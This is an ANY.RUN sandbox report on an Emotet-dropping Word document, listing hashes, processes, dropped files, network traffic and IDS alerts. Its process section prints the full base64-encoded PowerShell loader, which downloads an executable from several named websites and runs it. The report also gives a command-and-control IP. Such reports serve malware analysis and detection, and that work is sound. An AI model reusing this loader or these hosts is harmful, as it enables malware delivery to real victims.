analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

pBNlLhfN

Full analysis: https://app.any.run/tasks/b689a98e-a72b-4ff2-abf2-f68964c45e8a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 15, 2019, 08:33:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Garden Cayman Islands Dollar, Subject: circuit, Author: Pearl Beatty, Comments: cross-platform PCI plum, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 15 08:34:00 2019, Last Saved Time/Date: Wed May 15 08:34:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

6D132F7ED386E77C1DBB8BDC02820698

SHA1:

09C80F69FF7A61EBA8145538C168AC52FC5E7CDC

SHA256:

1041BF0B05D7AB777252793A46FC9626D90002B87379AED40A1E735DF59B4CE7

SSDEEP:

3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q0PNt4LQRnfCHnxBnn9Y:a77HUUUUUUUUUUUUUUUUUUUT52VZSLQR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 299.exe (PID: 1016)
      • 299.exe (PID: 2156)
      • soundser.exe (PID: 2964)
      • soundser.exe (PID: 3948)

    • Emotet process was detected

      • soundser.exe (PID: 2964)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2860)

    • EMOTET was detected

      • soundser.exe (PID: 3948)

    • Connects to CnC server

      • soundser.exe (PID: 3948)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2860)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2860)
      • 299.exe (PID: 1016)

    • Connects to server without host name

      • soundser.exe (PID: 3948)

    • Starts itself from another location

      • 299.exe (PID: 1016)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3372)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Satterfield
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 201
Paragraphs: 1
Lines: 1
Company: Zemlak LLC
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 172
Words: 30
Pages: 1
ModifyDate: 2019:05:15 07:34:00
CreateDate: 2019:05:15 07:34:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: cross-platform PCI plum
Keywords: -
Author: Pearl Beatty
Subject: circuit
Title: Garden Cayman Islands Dollar
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 299.exe no specs 299.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3372"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\pBNlLhfN.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2860powershell -enc JAB3ADgANQA1ADIAMgBfADkAPQAnAGwAOQBfADUAOQAxADcAMAAnADsAJABBADAAOQA2ADkAOQAgAD0AIAAnADIAOQA5ACcAOwAkAEsANgA0ADgAOAAxADkAMAA9ACcAbwAxAF8AOAAyADcANwAnADsAJAB6ADMAMwA1AF8AOQBfADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAMAA5ADYAOQA5ACsAJwAuAGUAeABlACcAOwAkAFYAMwA1ADEAMgA3AD0AJwBGADkAXwAwADYAMgAyACcAOwAkAE0ANAA3ADgAMQA3AF8ANwA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AGUAYABCAGAAYwBMAEkARQBOAFQAOwAkAEQANwAxADUAMwBfADAAPQAnAGgAdAB0AHAAOgAvAC8AZAByAG0AYQByAGkAbgBzAC4AYwBvAG0ALwBlAG4AZwBsAC8AcABDAEEAZABPAEwAVwBMAEoALwBAAGgAdAB0AHAAOgAvAC8AaAB5AGIAcgBpAGQAYgB1AHMAaQBuAGUAcwBzAHMAbwBsAHUAdABpAG8AbgBzAC4AYwBvAG0ALgBhAHUALwBjAGcAaQAtAGIAaQBuAC8AdAA2AHkAZQAwAGoAXwB3AHkAaABmADQAeQB3AC0AMgAvAEAAaAB0AHQAcAA6AC8ALwBkAHUAcgBhAGsAYgB1AGYAZQBjAGUAbgBnAGUAbABrAG8AeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ARwByAEkAQgBRAFQAbgBvAE8ALwBAAGgAdAB0AHAAOgAvAC8AcABlAHIAZgBvAHIAbQBhAG4AYwBlAHYAaQB0AGEAbABpAHQAeQAuAG4AZQB0AC8AcABhAHIAdABuAGUAcgAvAHIAcQAyAHQAbwB0AHYAXwBiAHIAeQBoAGQAcQBqAGMAMgAtADEANwAzADIAMAAvAEAAaAB0AHQAcAA6AC8ALwB0AG4AcgBrAGUAbgB0AG8AbgBvAGQAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgB4AGEAbABqAG4AZQBxAF8AZgA5AHYAYwB3AHYAcwB6ADAAMwAtADAAMQA1ADgANAA1ADUAMQA5AC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAEUAOQA2ADIAMgAwAD0AJwB6ADgAMQA5ADcANgAnADsAZgBvAHIAZQBhAGMAaAAoACQAawA0ADUANwAwADgANwAgAGkAbgAgACQARAA3ADEANQAzAF8AMAApAHsAdAByAHkAewAkAE0ANAA3ADgAMQA3AF8ANwAuAGQATwBXAG4ATABvAEEARABmAEkATABFACgAJABrADQANQA3ADAAOAA3ACwAIAAkAHoAMwAzADUAXwA5AF8AMAApADsAJABIADMANgAwADUAMwAyADUAPQAnAEYAMAA4ADQAXwAwADAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB6ADMAMwA1AF8AOQBfADAAKQAuAGwAZQBuAEcAVABIACAALQBnAGUAIAAzADkAOAA4ADgAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAegAzADMANQBfADkAXwAwADsAJABmADEAMwA0ADgAOQAzADAAPQAnAFoANABfADEANAAwADcAXwAnADsAYgByAGUAYQBrADsAJABmADEAOAA2ADkAOQA3ADgAPQAnAHIANwBfADIAMwAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAOABfADQAMwA2AD0AJwB2ADcAXwAxADMAXwA0ADcAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2156"C:\Users\admin\299.exe" C:\Users\admin\299.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1016--809e8ef0C:\Users\admin\299.exe
299.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2964"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
299.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3948--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 697
Read events
1 216
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
3372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRED89.tmp.cvr
MD5:
SHA256:
2860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J9L56ICJZVO08KA236US.temp
MD5:
SHA256:
3372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:81A754626A6758CF8377744917E1B15D
SHA256:E9DB8A72E09FE3756FC7B1AD0B628514C2B43111E9C875FB5171319561257DF4
3372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D064D393.wmfwmf
MD5:63A1F08887F0F3FAA20FCE38C1FC4034
SHA256:62D64BA8E04E020E581D9D74E1EB230553B352281D38FEEDCCC95F817CF271AD
3372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AC65078.wmfwmf
MD5:B097D53C4CDEE257E2F3AE858E5C3CEF
SHA256:ED4223C7037042E615672F18A64A53E81C918CDCF93499C7C440A4879ECE6AAB
3372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F61B488F.wmfwmf
MD5:F2B20B5F10CABA504B934336D6FA0152
SHA256:A67D8F01EEE8A6F5AC4883B5B2545CB41DB634C6BCCFC602373F2445FBC0B88D
3372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4BD9E619.wmfwmf
MD5:C212FA90560CCF03F818206F8AE21E52
SHA256:CDD04FC9018F14E1C703E1D7F41D111200B772C0F16CA7E4186C0E73894924F2
3372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7442A944.wmfwmf
MD5:95225F58500072AE9E474D2A546A3337
SHA256:0BD191A082CDB21B49C76A04D513523E607D70BE7B7DABB50E6553852E0FE6D3
2860powershell.exeC:\Users\admin\299.exeexecutable
MD5:CB9026E269F6A2BF6DB1C923A3451A16
SHA256:12BA09D1FB95A170E4FDCB28F1DC36882D2CB47E4A6D8219899ABDC2005DB6D4
3372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C68BB26C.wmfwmf
MD5:41BD76BD6E3DE248416A821E8E6768D3
SHA256:CDC3851365F8839991D661FC6A2DAE3FEB9E033512D3CB0C14D5ABA25A9A6A99
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2860
powershell.exe
GET
200
13.76.250.225:80
http://drmarins.com/engl/pCAdOLWLJ/
SG
executable
74.5 Kb
malicious
3948
soundser.exe
POST
200.85.46.122:80
http://200.85.46.122/glitch/arizona/ringin/
PY
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2860
powershell.exe
13.76.250.225:80
drmarins.com
Microsoft Corporation
SG
suspicious
200.85.46.122:80
Telecel S.A.
PY
malicious

DNS requests

Domain
IP
Reputation
drmarins.com
  • 13.76.250.225
malicious

Threats

PID
Process
Class
Message
2860
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2860
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2860
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3948
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
pBNlLhfN